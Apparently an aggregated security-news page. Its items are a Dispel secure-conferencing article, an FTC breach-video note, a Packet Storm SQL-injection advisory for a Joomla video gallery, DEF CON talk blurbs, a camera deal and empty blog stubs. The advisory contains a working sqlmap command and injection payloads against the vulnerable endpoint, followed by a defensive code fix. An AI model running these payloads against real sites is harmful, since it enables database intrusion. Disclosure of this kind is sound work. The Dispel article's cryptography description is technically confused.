Video

Secure Video Conferencing Solution Protects Content and Metadata in Voice and Video Communication

The need for global secure voice and video communication is constantly growing. Whether it's corporate intellectual property (IP) being shared between dispersed research centers or legal offices discussing mergers and acquisitions, both content and metadata need to be protected from surveillance.

While the content of video conference sessions is relatively easy to protect with encryption, the metadata remains visible to hackers, governments and agencies.

Metadata (source, destination, timing, location, etc.), and especially patterns of metadata, can support strong inferences about content.

Dispel, a U.S. company formed in 2014 and based in New York, has launched what it calls 'the first commercially available counter-reconnaissance voice and video system' that 'renders live-stream communications impenetrable to metadata-driven surveillance and hacking.'

Dispel, the company told SecurityWeek, takes a new approach to security. Traditionally, companies defend their networks by building bigger and stronger walls; but this approach leaves attackers with a huge advantage: they have time to locate unknown weaknesses. Dispel's approach is to hide the network and make it transient.

"Enterprises and professionals," says Scott Crawford, research director of information security at 451 Research, "particularly those stationed in insecure regions and locales, require a secure communications platform that can be trusted, and free-from-surveillance voice and video communication tools for their business needs."

Metadata is the weak point. Many countries allow their agencies unrestricted access to communications metadata. "Parallel with the increased use of encryption, big data analysis and behavioral inference have become the techniques of choice for technically sophisticated parties attempting to decipher what companies, governments, and persons of interest are communicating, as well as where their assets are located," comments Ethan Schmertzler, CEO of Dispel.

Dispel promises complete security of communication by first providing the videoconferencing software, and then protecting the content and hiding or neutralizing the metadata. The content of the communication is protected by a combination of SHA-256 with a 4096-bit key and a 2048-bit RSA key. The metadata is hidden, or dispersed, with a scattergrid approach similar but superior to that used by TOR. Very simply, Dispel bounces the communications between randomly provisioned virtual machines in and between different cloud providers. These are currently Amazon, Azure (soon), DigitalOcean, Rackspace, SoftLayer and Vultr.

However, the user is able to control that data through the software console, thus never losing its chain of custody. The entire Dispel infrastructure remains under the licensed control of the user, and regulatory compliance can be controlled through geographic specifications. For example, US defense companies could insist that the communications remain within the US; European health or pharmaceutical companies could insist that data remains within the European Union. The user is able to specify which cloud providers and which of their data centers to employ, or leave the system to choose the route from location to destination at random.

The process leaves no forensic footprint. Firstly, the network (or route) cannot be predicted by an adversary, and secondly it is automatically dismantled on completion. The resources used are subsequently re-provisioned by the cloud provider to other unassociated cloud users.

Two of the major weaknesses of the TOR approach to security and anonymity are also eliminated. Monitoring and timing entry and exit points is impossible -- the traffic looks just like any other encrypted traffic entering and leaving a general-purpose cloud provider. Furthermore, the inherently low speeds of TOR are replaced by enterprise-quality, high-speed cloud communication.

Dispel requires no local agent. It is operated entirely through the browser and is currently supported by Chrome, Firefox, Vivaldi, and Opera on macOS, Windows, Linux, and Android. This makes it particularly easy to use, and suitable for anything from high-powered financial circles to a publisher communicating with a single journalist in a sensitive region.


Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.



SecurityWeek RSS Feed

Original release date: September 22, 2016

The Federal Trade Commission (FTC) has released a step-by-step video for users whose personal information may have been exposed in a data breach. The video explains how to report an incident and develop a personal recovery plan after a data breach has occurred.

US-CERT encourages users to review the FTC blog and US-CERT Tips on Avoiding Social Engineering and Phishing Attacks, Safeguarding Your Data, and Protecting Your Privacy for more information.



US-CERT Current Activity

Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description: A video slideshow gallery.
Vulnerability:
The following code in ajax_url.php does not prevent an unauthenticated user from injecting SQL: the galleryid POST parameter is concatenated directly into the WHERE clause of a query without validation.

Vulnerable code in ajax_url.php (excerpt):

define('_JEXEC',1);
defined('_JEXEC') or die('Restircted access');   // _JEXEC was just defined above, so this guard never fires
...
if($_POST['task']=="load_videos_content")
{
    $page = 1;

    if(!empty($_POST["page"]) && is_numeric($_POST['page']) && $_POST['page']>0){
        $paramssld='';
        $db5 = JFactory::getDBO();
        $query5 = $db->getQuery(true);
        $query5->select('*');
        $query5->from('#__huge_it_videogallery_params');
        $db->setQuery($query5);
        $options_params = $db5->loadObjectList();
        foreach ($options_params as $rowpar) {
            $key = $rowpar->name;
            $value = $rowpar->value;
            $paramssld[$key] = $value;
        }

        $page = $_POST["page"];
        $num=$_POST['perpage'];              // unvalidated
        $start = $page * $num - $num;
        $idofgallery=$_POST['galleryid'];    // unvalidated, attacker-controlled

        $query = $db->getQuery(true);
        $query->select('*');
        $query->from('#__huge_it_videogallery_videos');
        $query->where('videogallery_id ='.$idofgallery);   // concatenated straight into the WHERE clause
        $query->order('#__huge_it_videogallery_videos.ordering asc');
        $db->setQuery($query,$start,$num);
        ...

CVE-2016-1000123
Exploit Code:
$ sqlmap -u 'http://example.com/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2" --level=5 --risk=3
.
.
.
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
---
[19:36:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[19:36:55] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2714 times
[19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

[*] shutting down at 19:36:55
Advisory: http://www.vapidlabs.com/advisory.php?v=169
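A hardened form of the load_videos_content handler, as an added example (it is not the vendor's fixed v1.1.0 code). It assumes Joomla 3's JDatabaseDriver API, PHP 7 for the ?? operator, and the table names shown in the advisory; every request parameter is validated as an integer before it reaches the query builder, so the payload shapes in the sqlmap output above are rejected up front.

```php
<?php
// Added example, not the vendor's code: a hardened load_videos_content
// handler for the ajax_url.php excerpt. Assumes Joomla 3's JDatabaseDriver
// API and PHP 7; table names are the ones shown in the advisory.

// Keep the guard but never define _JEXEC in the same file: the original
// define('_JEXEC',1) turns the check on the next line into a no-op.
defined('_JEXEC') or die('Restricted access');

/**
 * Validate one POST parameter as a positive integer, optionally capped.
 * Returns false for anything that is not a plain integer in range, so a
 * string such as "-3390 OR 1 GROUP BY ..." or "(CASE WHEN ... SLEEP(5) ...)"
 * is rejected before it can reach the query builder.
 */
function positiveInt($value, $max = PHP_INT_MAX)
{
    return filter_var($value, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => $max]]);
}

function loadVideosContent(JDatabaseDriver $db, array $post)
{
    $page      = positiveInt($post['page'] ?? 1);
    $perPage   = positiveInt($post['perpage'] ?? 20, 100); // cap page size
    $galleryId = positiveInt($post['galleryid'] ?? null);

    if ($page === false || $perPage === false || $galleryId === false) {
        throw new InvalidArgumentException('invalid page, perpage or galleryid');
    }
    $start = ($page - 1) * $perPage;

    // The id is an int by now; the (int) cast documents that no string built
    // from user input is ever concatenated into the SQL text.
    $query = $db->getQuery(true)
        ->select('*')
        ->from($db->quoteName('#__huge_it_videogallery_videos'))
        ->where($db->quoteName('videogallery_id') . ' = ' . (int) $galleryId)
        ->order($db->quoteName('ordering') . ' ASC');

    $db->setQuery($query, $start, $perPage);
    return $db->loadObjectList();
}

if (isset($_POST['task']) && $_POST['task'] === 'load_videos_content') {
    $videos = loadVideosContent(JFactory::getDbo(), $_POST);
    echo json_encode($videos);
}
```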


Exploit Files ≈ Packet Storm

MR. ROBOT is a rare treat - a network television show whose hacker protagonist is a fully realized character with a realistically attainable set of skills. No hyper-typing, no gibberish masquerading as tech jargon, no McGuffins to magically paper over plot holes with hacker dust. MR. ROBOT takes the tech as seriously as the drama.

One of the main reasons for this verisimilitude is the work of Kor Adana, MR. ROBOT's advisor on all things hackish. His fingerprints are on every terminal window in the show. Another advisor to the show is our very own CJunky - known to the outside world as hacker and raconteur Marc Rogers. Join Dark Tangent for a panel discussion of MR. ROBOT: the phenomenon, the hacks and the crazy ways the show seems to pull its storylines from the future. Bring your questions, and keep an eye out for late-breaking special guests.

Kor Adana’s interest in technology started as a child when he tried to build a red box to get free calls on pay phones. By the time he was in middle school, he was building his own computer systems and getting into trouble. After obtaining a B.S. in IT Network Administration, Kor went on to work in enterprise network security for one of the world’s largest automakers. He performed penetration testing, designed security policies, managed enterprise-wide eDiscovery, and conducted forensics for legal and HR matters. While there, he also worked alongside NASA in a high-profile government investigation. He eventually left the IT world to pursue his true passion, writing for film and television. He’s worked with the producers of THE WALKING DEAD, THE SHIELD, LOST, and DEXTER. He is currently a writer and technical supervisor for USA's Golden Globe Award-winning drama, MR. ROBOT. He also has one of his own projects in development with Universal Cable Productions.

Ryan Kazanciyan is the Chief Security Architect for Tanium and has thirteen years of experience in incident response and forensics, penetration testing, and security architecture. Prior to joining Tanium, Ryan was a technical director and lead investigator at Mandiant, where he worked with dozens of Fortune 500 organizations impacted by targeted attacks.

Ryan has presented security research at dozens of events worldwide, including Black Hat, DEFCON, and RSA. He has led training sessions for hundreds of the FBI's cyber squad agents, and was a contributing author for "Incident Response and Computer Forensics, 3rd Edition", published in 2014.

Andre McGregor is at DEFCON 24 celebrating his one-year anniversary as Tanium’s Director of Security responsible for internal cybersecurity. Prior to joining Tanium, Andre was a fresh-faced new agent with the FBI working cases like the NYC Subway bomber and Times Square car bomb while arresting his share of Italian Organized Crime bosses. His computer engineering background led him to help form FBI New York’s first cyber national security squad focused on computer intrusions from China, Russia, and Iran. Having deployed with NSA Blue Team and DHS US-CERT/ICS-CERT as a technically-trained cyber agent, Andre has led numerous large-scale cyber investigations ranging from financial crimes to critical infrastructure protection. In his free time, when he wasn’t sifting through terabytes of Netflow with SiLK and playing around with Autopsy and IDA, Andre was an FBI firearms instructor, dive team medic, and a volunteer firefighter driving fire trucks. After graduating from Brown University, Andre worked as an engineer at Goldman Sachs and later transitioned to IT Director at Cardinal Health/Advogent. Having shed the badge and gun last year, Andre currently serves as the FBI cyber technical consultant for the TV show Mr. Robot.

Kim Zetter is an award-winning, senior staff reporter at Wired covering cybercrime, privacy, and security. She is writing a book about Stuxnet, a digital weapon that was designed to sabotage Iran's nuclear program.


DEF CON Announcements!

What if your wireless mouse was an effective attack vector? Research reveals this to be the case for mice from Logitech, Microsoft, Dell, Lenovo, Hewlett-Packard, Gigabyte, and Amazon. Dubbed 'MouseJack', this class of security vulnerabilities allows keystroke injection into non-Bluetooth wireless mice. Imagine you are catching up on some work at the airport, and you reach into your laptop bag to pull out your phone charger. As you glance back at your screen, you see the tail end of an ASCII art progress bar followed by your shell history getting cleared.

Before you realize what has happened, an attacker has already installed malware on your laptop. Or maybe they just exfiltrated a git repository and your SSH keys. In the time it took you to plug in your phone, you got MouseJacked. The attacker is camped out at the other end of the terminal, equipped with a commodity USB radio dongle and a directional patch antenna hidden in a backpack, and boards her plane as soon as the deed is done. The reality of MouseJack is that an attacker can inject keystrokes into your wireless mouse dongle from over 200 meters away, at a rate of up to 7500 keystrokes per minute (one every 8ms).

Most wireless keyboards encrypt the data going between the keyboard and computer in order to deter sniffing, but wireless mouse traffic is generally unencrypted. The result is that wireless mice and keyboards ship with USB dongles that can support both encrypted and unencrypted RF packets. A series of implementation flaws makes it possible for an attacker to inject keystrokes directly into a victim's USB dongle using easily accessible, cheap hardware, in most cases only requiring that the user has a wireless mouse. The majority of affected USB dongles are unpatchable, making it likely that vulnerable computers will be common in the wild for the foreseeable future.

This talk will explain the research process that led to the discovery of these vulnerabilities, covering specific tools and techniques. Results of the research will be detailed, including protocol behavior, packet formats, and technical specifics of each vulnerability. Additional vulnerabilities affecting 14 vendors are currently in disclosure, and will be revealed during this talk.

Marc is a security researcher and software engineer at Bastille Networks, where he focuses on RF/IoT threats present in enterprise environments. He has been hacking on software defined radios since 2013, when he competed as a finalist in the DARPA Spectrum Challenge. In 2011, he wrote software to reassemble shredded documents for the DARPA Shredder Challenge, finishing the competition in third place out of 9000 teams.

Twitter: @marcnewlin


DEF CON Announcements!

wifi security cam

This full-featured camera broadcasts over wifi, allowing you to view live from multiple mobile devices at once. Its footage records to micro SD, where it is stored and accessible remotely as well. Remote pan/tilt/zoom, 2-way voice, motion-detection alert, and night vision capabilities are all onboard. This model averages 4 out of 5 stars on Amazon from over 4,100 people. Amazon indicates that its typical list price of $200 has been reduced 50% to $100.

This story, "50% off Vimtag VT-361 Pan&Tilt HD WiFi Video Security Camera with Night Vision - Deal Alert", was originally published by InfoWorld Security.

Oct 7 2015 2:14PM GMT
Ken Harthun, Security Corner
Tags: humor, Security, security awareness, Security scan, Security threats

Oct 31 2015 4:12AM GMT
Ken Harthun, Security Corner